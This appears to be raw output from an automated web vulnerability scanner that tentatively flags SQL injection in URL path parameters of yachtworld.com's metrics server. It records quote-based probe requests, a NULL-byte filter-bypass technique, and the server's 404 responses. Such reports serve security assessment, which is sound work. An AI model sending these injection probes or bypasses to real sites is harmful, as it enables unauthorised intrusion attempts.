GET /b%2527/ss/deyachtworld/1/H.17/s43482092181220?AQB=1&ndh=1&t=27/0/2011%2013%3A20%3A34%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Boat_Details_US&g=http%3A//www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States&cc=USD&ch=Boats&server=ywapp05&events=event11%2Cevent2&c1=Boat%20Details&h1=Boats%7CAdvanced%20Search&v3=Boat_Details_US&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v28=www.yachtworld.com&c32=2262662&v32=2262662&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156034601%7C1298748034601%3B%20s_lv%3D1296156034602%7C1390764034602%3B%20s_lv_s%3DFirst%2520Visit%7C1296157834602%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:51 GMT
Server: Omniture DC/2.0.0
Content-Length: 443
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/deyachtworld/1/H.17/s43482092181220 was not
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/deyachtworld/1/H.17/s43482092181220?AQB=1&ndh=1&t=27/0/2011%2013%3A20%3A34%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Boat_Details_US&g=http%3A//www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States&cc=USD&ch=Boats&server=ywapp05&events=event11%2Cevent2&c1=Boat%20Details&h1=Boats%7CAdvanced%20Search&v3=Boat_Details_US&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v28=www.yachtworld.com&c32=2262662&v32=2262662&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296156034601%7C1298748034601%3B%20s_lv%3D1296156034602%7C1390764034602%3B%20s_lv_s%3DFirst%2520Visit%7C1296157834602%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:51 GMT
Server: Omniture DC/2.0.0
xserver: www614
Content-Length: 0
Content-Type: text/html


1.4. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s43772089285776 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.yachtworld.com
Path:   /b/ss/deyachtworld/1/H.17/s43772089285776

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/deyachtworld/1/H.17/s43772089285776?AQB=1&ndh=1&t=27/0/2011%2013%3A24%3A8%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=searchResults_US&g=http%3A//www.yachtworld.com/core/listing/cache/searchResults.jsp%3Fcit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dhomepage%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26cur&r=http%3A//www.yachtworld.com/core/listing/advancedSearch.jsp%3FNtk%3DboatsEN%26searchtype%3Dhomepage%26fromYear%3D2004%26sm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26toLength%3D32%26fromLength%3D24%26fromPrice%3D0%26man%3Dregulator%26slim%3Dquick%26is%3Dfalse%26pricderange%3DSelect%2BPrice%2BRange&cc=USD&ch=Search&server=ywapp04&events=event2%2Cevent1&c1=Search%20Results&h1=Boats%7CAdvanced%20Search&v3=searchResults_US&c4=no%20search%20phrase%20entered&v4=no%20search%20phrase%20entered&c5=regulator&v5=regulator&c6=used&v6=used&c7=no%20search%20phrase%20entered&v7=no%20search%20phrase%20entered&c8=24%27-32%27&v8=24%27-32%27&c9=%3E2004&v9=%3E2004&c10=no%20search%20phrase%20entered&v10=no%20search%20phrase%20entered&c11=no%20search%20phrase%20entered&v11=no%20search%20phrase%20entered&c12=no%20search%20phrase%20entered&v12=no%20search%20phrase%20entered&c13=no%20search%20phrase%20entered&v13=no%20search%20phrase%20entered&c14=no%20search%20phrase%20entered&v14=no%20search%20phrase%20entered&c15=no%20search%20phrase%20entered&v15=no%20search%20phrase%20entered&c16=no%20search%20phrase%20entered&v16=no%20search%20phrase%20entered&c17=united%20states&v17=united%20states&c18=no%20search%20phrase%20entered&v18=no%20search%20phrase%20entered&c19=74&c20=Homepage&c21=Default&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v27=Homepage&v28=www.yachtworld.com&v31=Default&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pid=advancedSearch_US&pidt=1&oid=Search&oidt=3&ot=SUBMIT&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=&rid=&cint=100&pbsint=&boatsAddedSelected=-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_pers=%20s_nr%3D1296156248340%7C1298748248340%3B%20s_lv%3D1296156248342%7C1390764248342%3B%20s_lv_s%3DFirst%2520Visit%7C1296158048342%3B; s_sess=%20s_sq%3Ddeyachtworld%253D%252526pid%25253DadvancedSearch_US%252526pidt%25253D1%252526oid%25253DSearch%252526oidt%25253D3%252526ot%25253DSUBMIT%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:37:26 GMT
Server: Omniture DC/2.0.0
Content-Length: 441
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/deyachtworld/1/H.17/s43772089285776 was not fo
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/deyachtworld/1/H.17/s43772089285776?AQB=1&ndh=1&t=27/0/2011%2013%3A24%3A8%204%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=searchResults_US&g=http%3A//www.yachtworld.com/core/listing/cache/searchResults.jsp%3Fcit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dhomepage%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26cur&r=http%3A//www.yachtworld.com/core/listing/advancedSearch.jsp%3FNtk%3DboatsEN%26searchtype%3Dhomepage%26fromYear%3D2004%26sm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26toLength%3D32%26fromLength%3D24%26fromPrice%3D0%26man%3Dregulator%26slim%3Dquick%26is%3Dfalse%26pricderange%3DSelect%2BPrice%2BRange&cc=USD&ch=Search&server=ywapp04&events=event2%2Cevent1&c1=Search%20Results&h1=Boats%7CAdvanced%20Search&v3=searchResults_US&c4=no%20search%20phrase%20entered&v4=no%20search%20phrase%20entered&c5=regulator&v5=regulator&c6=used&v6=used&c7=no%20search%20phrase%20entered&v7=no%20search%20phrase%20entered&c8=24%27-32%27&v8=24%27-32%27&c9=%3E2004&v9=%3E2004&c10=no%20search%20phrase%20entered&v10=no%20search%20phrase%20entered&c11=no%20search%20phrase%20entered&v11=no%20search%20phrase%20entered&c12=no%20search%20phrase%20entered&v12=no%20search%20phrase%20entered&c13=no%20search%20phrase%20entered&v13=no%20search%20phrase%20entered&c14=no%20search%20phrase%20entered&v14=no%20search%20phrase%20entered&c15=no%20search%20phrase%20entered&v15=no%20search%20phrase%20entered&c16=no%20search%20phrase%20entered&v16=no%20search%20phrase%20entered&c17=united%20states&v17=united%20states&c18=no%20search%20phrase%20entered&v18=no%20search%20phrase%20entered&c19=74&c20=Homepage&c21=Default&c22=2%3A15PM&c23=Thursday&c24=Weekday&c27=www.yachtworld.com&v27=Homepage&v28=www.yachtworld.com&v31=Default&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pid=advancedSearch_US&pidt=1&oid=Search&oidt=3&ot=SUBMIT&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=&fromPrice=0&toPrice=&currencyid=100&city=&rid=&cint=100&pbsint=&boatsAddedSelected=-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; s_pers=%20s_nr%3D1296156248340%7C1298748248340%3B%20s_lv%3D1296156248342%7C1390764248342%3B%20s_lv_s%3DFirst%2520Visit%7C1296158048342%3B; s_sess=%20s_sq%3Ddeyachtworld%253D%252526pid%25253DadvancedSearch_US%252526pidt%25253D1%252526oid%25253DSearch%252526oidt%25253D3%252526ot%25253DSUBMIT%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:37:26 GMT
Server: Omniture DC/2.0.0
xserver: www632
Content-Length: 0
Content-Type: text/html


1.5. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.yachtworld.com
Path:   /b/ss/deyachtworld/1/H.17/s48372025459539

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/deyachtworld/1/H.17/s48372025459539?AQB=1&pccr=true&vidn=26A0E25385162B05-600001A6003F61D3&&ndh=1&t=27/0/2011%2013%3A17%3A16%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/core/listing/cache/pl_search_results.jsp%3Fywo%3Dstarlingmarine%26ps%3D50%26type%3D%26new%3D%26luom%3D126%26hosturl%3Dstarlingmarine%26page%3Dbroker%26slim%3Dbroker%26lineonly&r=http%3A//www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&v22=2%3A15PM&c23=Thursday&v23=Thursday&c24=Weekday&v24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=713&bh=1200&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarine&page=broker&slim=broker&lineonly
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.1.10.1296155835; s_pers=%20s_nr%3D1296155836661%7C1298747836661%3B%20s_lv%3D1296155836663%7C1390763836663%3B%20s_lv_s%3DFirst%2520Visit%7C1296157636663%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:29 GMT
Server: Omniture DC/2.0.0
Content-Length: 441
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/deyachtworld/1/H.17/s48372025459539 was not fo
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/deyachtworld/1/H.17/s48372025459539?AQB=1&pccr=true&vidn=26A0E25385162B05-600001A6003F61D3&&ndh=1&t=27/0/2011%2013%3A17%3A16%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/core/listing/cache/pl_search_results.jsp%3Fywo%3Dstarlingmarine%26ps%3D50%26type%3D%26new%3D%26luom%3D126%26hosturl%3Dstarlingmarine%26page%3Dbroker%26slim%3Dbroker%26lineonly&r=http%3A//www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&v22=2%3A15PM&c23=Thursday&v23=Thursday&c24=Weekday&v24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=713&bh=1200&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarine&page=broker&slim=broker&lineonly
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.1.10.1296155835; s_pers=%20s_nr%3D1296155836661%7C1298747836661%3B%20s_lv%3D1296155836663%7C1390763836663%3B%20s_lv_s%3DFirst%2520Visit%7C1296157636663%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:31:29 GMT
Server: Omniture DC/2.0.0
xserver: www493
Content-Length: 0
Content-Type: text/html


1.6. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.yachtworld.com
Path:   /b/ss/deyachtworld/1/H.17/s48372025459539

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/deyachtworld/1%00'/H.17/s48372025459539?AQB=1&ndh=1&t=27/0/2011%2013%3A17%3A16%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/core/listing/cache/pl_search_results.jsp%3Fywo%3Dstarlingmarine%26ps%3D50%26type%3D%26new%3D%26luom%3D126%26hosturl%3Dstarlingmarine%26page%3Dbroker%26slim%3Dbroker%26lineonly&r=http%3A//www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&v22=2%3A15PM&c23=Thursday&v23=Thursday&c24=Weekday&v24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=713&bh=1200&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarine&page=broker&slim=broker&lineonly
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.1.10.1296155835; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B; s_pers=%20s_nr%3D1296155836661%7C1298747836661%3B%20s_lv%3D1296155836663%7C1390763836663%3B%20s_lv_s%3DFirst%2520Visit%7C1296157636663%3B

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 27 Jan 2011 19:40:05 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/deyachtworld/1 was not found on this server.</p
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/deyachtworld/1%00''/H.17/s48372025459539?AQB=1&ndh=1&t=27/0/2011%2013%3A17%3A16%204%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.yachtworld.com/core/listing/cache/pl_search_results.jsp%3Fywo%3Dstarlingmarine%26ps%3D50%26type%3D%26new%3D%26luom%3D126%26hosturl%3Dstarlingmarine%26page%3Dbroker%26slim%3Dbroker%26lineonly&r=http%3A//www.starlingmarine.com/used-new-boats-wilmington-morehead-nc.html&cc=USD&ch=BrokerWebSites&events=event2&c22=2%3A15PM&v22=2%3A15PM&c23=Thursday&v23=Thursday&c24=Weekday&v24=Weekday&c33=First%20Visit&v33=First%20Visit&c34=New&v34=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=713&bh=1200&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp?ywo=starlingmarine&ps=50&type=&new=&luom=126&hosturl=starlingmarine&page=broker&slim=broker&lineonly
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
